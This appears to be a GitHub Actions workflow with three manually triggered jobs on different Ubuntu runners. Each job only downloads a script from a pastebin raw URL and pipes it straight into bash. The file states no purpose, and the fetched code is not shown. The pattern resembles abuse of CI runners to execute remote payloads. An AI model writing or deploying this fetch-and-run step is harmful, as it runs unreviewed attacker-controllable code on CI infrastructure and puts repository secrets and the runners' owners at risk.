on: workflow_dispatch
jobs:
  s1:
    runs-on: ubuntu-26.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  s3:
    runs-on: ubuntu-24.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
  s5:
    runs-on: ubuntu-22.04
    steps:
      - run: |
          wget -qO- https://pastebin.com/raw/WYGs2qaH | tr -d '\r' | bash
